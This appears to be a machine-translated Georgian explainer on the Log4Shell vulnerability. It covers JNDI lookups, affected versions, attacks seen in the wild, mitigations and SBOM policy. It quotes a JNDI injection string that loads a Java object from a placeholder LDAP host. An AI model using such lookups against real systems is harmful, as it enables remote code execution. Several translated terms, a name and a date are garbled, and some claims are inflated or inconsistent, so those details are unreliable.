სარჩევი[დამალვა][ჩვენება]
2021 წლის ნოემბრის ბოლოს ჩვენ აღმოვაჩინეთ კიბერუსაფრთხოების მთავარი საფრთხე. ეს ექსპლუატაცია პოტენციურად იმოქმედებს მილიონობით კომპიუტერულ სისტემაზე მთელს მსოფლიოში.
ეს არის გზამკვლევი Log4j დაუცველობის შესახებ და იმის შესახებ, თუ როგორ შეუმჩნეველი დიზაინის ხარვეზი დატოვა მსოფლიოს კომპიუტერული სერვისების 90% ღია თავდასხმისთვის.
Apache Log4j არის ღია კოდის Java-ზე დაფუძნებული ჭრის პროგრამა, რომელიც შემუშავებულია Apache Software Foundation-ის მიერ. თავდაპირველად დაიწერა ჩეკი გიულჩუმ 2001 წელს, ახლა ის არის Apache Logging Services-ის ნაწილი, Apache Software Foundation-ის პროექტი.
კომპანიები მთელს მსოფლიოში იყენებენ Log4j ბიბლიოთეკას თავიანთ აპლიკაციებში შესვლის გასააქტიურებლად. სინამდვილეში, ჯავის ბიბლიოთეკა იმდენად გავრცელებულია, რომ მისი პოვნა შეგიძლიათ Amazon-ის, Microsoft-ის, Google-ის და სხვა აპლიკაციებში.
ბიბლიოთეკის გამორჩეულობა ნიშნავს, რომ კოდის ნებისმიერ პოტენციურ ხარვეზს შეუძლია მილიონობით კომპიუტერი ღია დატოვოს ჰაკერებისთვის. 24 წლის 2021 ნოემბერს ა ღრუბლის უსაფრთხოება Alibaba-ში მომუშავე მკვლევარმა აღმოაჩინა საშინელი ხარვეზი.
Log4j დაუცველობა, ასევე ცნობილი როგორც Log4Shell, შეუმჩნევლად არსებობდა 2013 წლიდან. დაუცველობამ მავნე აქტორებს საშუალება მისცა, გაეშვათ კოდი დაზარალებულ სისტემებზე, რომლებიც მუშაობენ Log4j. ის საჯაროდ გამოცხადდა 9 წლის 2021 დეკემბერს
ინდუსტრიის ექსპერტები Log4Shell ხარვეზს უწოდებენ ყველაზე დიდი დაუცველობა ბოლო მეხსიერებაში.
დაუცველობის გამოქვეყნებიდან ერთი კვირის შემდეგ კიბერუსაფრთხოების გუნდებმა მილიონობით თავდასხმა დააფიქსირეს. ზოგიერთი მკვლევარი აკვირდებოდა წუთში ასზე მეტი შეტევის სიჩქარეს.
როგორ მუშაობს?
იმის გასაგებად, თუ რატომ არის Log4Shell ასე საშიში, უნდა გავიგოთ, რა შეუძლია მას.
Log4Shell დაუცველობა იძლევა კოდის თვითნებური შესრულების საშუალებას, რაც ძირითადად ნიშნავს, რომ თავდამსხმელს შეუძლია ნებისმიერი ბრძანების ან კოდის გაშვება სამიზნე მანქანაზე.
როგორ ახერხებს ამას?
პირველ რიგში, ჩვენ უნდა გავიგოთ რა არის JNDI.
Java Naming and Directory Interface (JNDI) არის Java სერვისი, რომელიც ჯავას პროგრამებს საშუალებას აძლევს აღმოაჩინონ და მოიძიონ მონაცემები და რესურსები სახელის საშუალებით. ეს დირექტორია სერვისები მნიშვნელოვანია, რადგან ისინი უზრუნველყოფენ ჩანაწერების ორგანიზებულ კომპლექტს დეველოპერებისთვის, რომ ადვილად მიმართონ აპლიკაციების შექმნისას.
JNDI-ს შეუძლია გამოიყენოს სხვადასხვა პროტოკოლი გარკვეულ დირექტორიაში წვდომისთვის. ერთ-ერთი ასეთი პროტოკოლი არის Lightweight Directory Access Protocol, ან LDAP.
სტრიქონის ჩაწერისას, log4j ასრულებს სტრიქონების შეცვლას, როდესაც ისინი ხვდებიან ფორმის გამონათქვამებს ${prefix:name}
.
მაგალითად, Text: ${java:version}
შეიძლება იყოს შესული, როგორც ტექსტი: Java ვერსია 1.8.0_65. ასეთი ჩანაცვლება ჩვეულებრივი მოვლენაა.
ასევე შეიძლება გვქონდეს ისეთი გამონათქვამები, როგორიცაა Text: ${jndi:ldap://example.com/file}
რომელიც იყენებს JNDI სისტემას Java ობიექტის URL-დან LDAP პროტოკოლის საშუალებით ჩასატვირთად.
ეს ეფექტურად ატვირთავს ამ URL-დან მოსულ მონაცემებს მანქანაში. ნებისმიერ პოტენციურ ჰაკერს შეუძლია მავნე კოდის მასპინძლობა საჯარო URL-ზე და დაელოდოს მანქანებს Log4j-ის გამოყენებით მის შესვლაზე.
ვინაიდან ჟურნალის შეტყობინებების შიგთავსი შეიცავს მომხმარებლის მიერ კონტროლირებულ მონაცემებს, ჰაკერებს შეუძლიათ საკუთარი JNDI მითითებების ჩასმა, რომლებიც მიუთითებენ მათ მიერ კონტროლირებად LDAP სერვერებზე. ეს LDAP სერვერები შეიძლება იყოს სავსე ჯავის მავნე ობიექტებით, რომლებიც JNDI-ს შეუძლია შეასრულოს დაუცველობის მეშვეობით.
რაც ამას აუარესებს არის ის, რომ არ აქვს მნიშვნელობა პროგრამა სერვერის მხარესაა თუ კლიენტის მხრიდან.
სანამ ლოგერს აქვს საშუალება, წაიკითხოს თავდამსხმელის მავნე კოდი, აპლიკაცია კვლავ ღიაა ექსპლოიტებისთვის.
ვინ დაზარალდა?
დაუცველობა გავლენას ახდენს ყველა სისტემასა და სერვისზე, რომლებიც იყენებენ APache Log4j-ს, ვერსიით 2.0-მდე და მათ შორის 2.14.1-მდე.
უსაფრთხოების რამდენიმე ექსპერტი გვირჩევს, რომ დაუცველობამ შეიძლება გავლენა მოახდინოს Java-ს გამოყენებით რამდენიმე აპლიკაციაზე.
ხარვეზი პირველად Microsoft-ის საკუთრებაში არსებულ Minecraft ვიდეო თამაშში აღმოაჩინეს. Microsoft-მა მოუწოდა მომხმარებლებს განაახლონ Java ვერსიის Minecraft პროგრამული უზრუნველყოფა, რათა თავიდან აიცილონ რაიმე რისკი.
ჯენ ისტერლი, კიბერუსაფრთხოების და ინფრასტრუქტურის უსაფრთხოების სააგენტოს (CISA) დირექტორი ამბობს, რომ მოვაჭრეებს აქვთ მთავარი პასუხისმგებლობა რათა თავიდან აიცილონ საბოლოო მომხმარებლები მავნე აქტორებისგან, რომლებიც გამოიყენებენ ამ დაუცველობას.
„მომწოდებლებს ასევე უნდა ჰქონდეთ კომუნიკაცია თავის მომხმარებლებთან, რათა დარწმუნდნენ, რომ საბოლოო მომხმარებლებმა იცოდნენ, რომ მათი პროდუქტი შეიცავს ამ დაუცველობას და პრიორიტეტული უნდა იყოს პროგრამული უზრუნველყოფის განახლებები.
გავრცელებული ინფორმაციით, თავდასხმები უკვე დაწყებულია. Symantec, კომპანია, რომელიც უზრუნველყოფს კიბერუსაფრთხოების პროგრამულ უზრუნველყოფას, აკვირდება თავდასხმის მოთხოვნის მრავალფეროვნებას.
აქ არის რამოდენიმე მაგალითი იმ ტიპის თავდასხმებისა, რომლებიც მკვლევარებმა აღმოაჩინეს:
- ბოტნეტი
ბოტნეტები არის კომპიუტერების ქსელი, რომელიც იმყოფება ერთი შემტევი მხარის კონტროლის ქვეშ. ისინი ხელს უწყობენ DDoS შეტევების შესრულებას, მონაცემების მოპარვას და სხვა თაღლითობას. მკვლევარებმა დააკვირდნენ Muhstik ბოტნეტს ჭურვის სკრიპტებში, რომლებიც გადმოწერილი იყო Log4j ექსპლოიტიდან.
- XMRig Miner Trojan
XMRig არის ღია კოდის კრიპტოვალუტის მაინერი, რომელიც იყენებს პროცესორებს Monero ტოკენის მოსაპოვებლად. კიბერკრიმინალებს შეუძლიათ დააინსტალირონ XMRig ხალხის მოწყობილობებზე, რათა მათ შეძლონ მათი დამუშავების ძალა მათი ცოდნის გარეშე გამოიყენონ.
- Khonsari Ransomware
Ransomware ეხება მავნე პროგრამის ფორმას, რომელიც შექმნილია ფაილების დაშიფვრა კომპიუტერზე. შემდეგ თავდამსხმელებს შეუძლიათ მოითხოვონ გადახდა დაშიფრულ ფაილებზე წვდომის დაბრუნების სანაცვლოდ. მკვლევარებმა აღმოაჩინეს Khonsari გამოსასყიდი პროგრამა Log4Shell შეტევებში. ისინი მიზნად ისახავს Windows სერვერებს და იყენებენ .NET Framework-ს.
რა მოხდება შემდეგ?
ექსპერტები ვარაუდობენ, რომ შესაძლოა თვეები ან შესაძლოა წლებიც კი დასჭირდეს Log4J დაუცველობით გამოწვეული ქაოსის სრულად გამოსწორებას.
ეს პროცესი მოიცავს ყველა დაზარალებული სისტემის განახლებას დაპატჩირებული ვერსიით. მაშინაც კი, თუ ყველა ეს სისტემა დაყენებულია, მაინც არსებობს შესაძლო უკანა კარის საფრთხე, რომელიც ჰაკერებმა შეიძლება უკვე დაამატეს ფანჯარაში, რომ სერვერები ღია იყო თავდასხმისთვის.
ბევრი გადაწყვეტილებები და შერბილებები არსებობს იმისათვის, რომ თავიდან აიცილონ აპლიკაციების ექსპლუატაცია ამ შეცდომით. ახალმა Log4j ვერსიამ 2.15.0-rc1 შეცვალა სხვადასხვა პარამეტრები ამ დაუცველობის შესამცირებლად.
JNDI-ის გამოყენებით ყველა ფუნქცია გამორთული იქნება ნაგულისხმევად და ასევე შეზღუდულია დისტანციური ძებნა. საძიებო ფუნქციის გამორთვა თქვენს Log4j კონფიგურაციაში დაგეხმარებათ შეამციროთ შესაძლო ექსპლოიტების რისკი.
Log4j-ს მიღმა, ჯერ კიდევ არის საჭირო უფრო ფართო გეგმა ღია წყაროს ექსპლოიტების თავიდან ასაცილებლად.
მაისის დასაწყისში თეთრმა სახლმა გამოაქვეყნა აღმასრულებელი ბრძანება რომელიც მიზნად ისახავდა ეროვნული კიბერუსაფრთხოების გაუმჯობესებას. იგი მოიცავდა დებულებას პროგრამული უზრუნველყოფის მასალების შესახებ (SBOM), რომელიც არსებითად იყო ოფიციალური დოკუმენტი, რომელიც შეიცავდა აპლიკაციის შესაქმნელად საჭირო ყველა ელემენტის ჩამონათვალს.
ეს მოიცავს ისეთ ნაწილებს, როგორიცაა ღია წყაროებიდან პაკეტები, დამოკიდებულებები და API-ები, რომლებიც გამოიყენება განვითარებისთვის. მიუხედავად იმისა, რომ SBOM-ების იდეა სასარგებლოა გამჭვირვალობისთვის, ნამდვილად დაეხმარება ის მომხმარებელს?
დამოკიდებულებების განახლება შეიძლება ძალიან რთული იყოს. კომპანიებს შეუძლიათ უბრალოდ აირჩიონ ნებისმიერი ჯარიმის გადახდა, ვიდრე რისკავს დამატებითი დროის დაკარგვას ალტერნატიული პაკეტების მოსაძებნად. შესაძლოა, ეს SBOM-ები მხოლოდ სასარგებლო იყოს, თუ მათი ფარგლებში შემდგომში შეზღუდულია.
დასკვნა
Log4j საკითხი უფრო მეტია, ვიდრე უბრალოდ ტექნიკური პრობლემა ორგანიზაციებისთვის.
ბიზნეს ლიდერებმა უნდა იცოდნენ პოტენციური რისკები, რომლებიც შეიძლება წარმოიშვას, როდესაც მათი სერვერები, პროდუქტები ან სერვისები ეყრდნობიან კოდს, რომელსაც ისინი თავად არ ინახავენ.
ღია და მესამე მხარის აპლიკაციებზე დაყრდნობა ყოველთვის გარკვეულ რისკთან არის დაკავშირებული. კომპანიებმა უნდა განიხილონ რისკის შემცირების სტრატეგიების შემუშავება, სანამ ახალი საფრთხეები გამოვა.
ინტერნეტის დიდი ნაწილი ეყრდნობა ღია კოდის პროგრამულ უზრუნველყოფას, რომელსაც აწარმოებს ათასობით მოხალისე მთელ მსოფლიოში.
თუ ჩვენ გვსურს შევინარჩუნოთ ვებ უსაფრთხო ადგილი, მთავრობებმა და კორპორაციებმა უნდა განახორციელონ ინვესტიციები ღია წყაროების ძალისხმევის და კიბერუსაფრთხოების სააგენტოების დაფინანსებაში, როგორიცაა CISA.
დატოვე პასუხი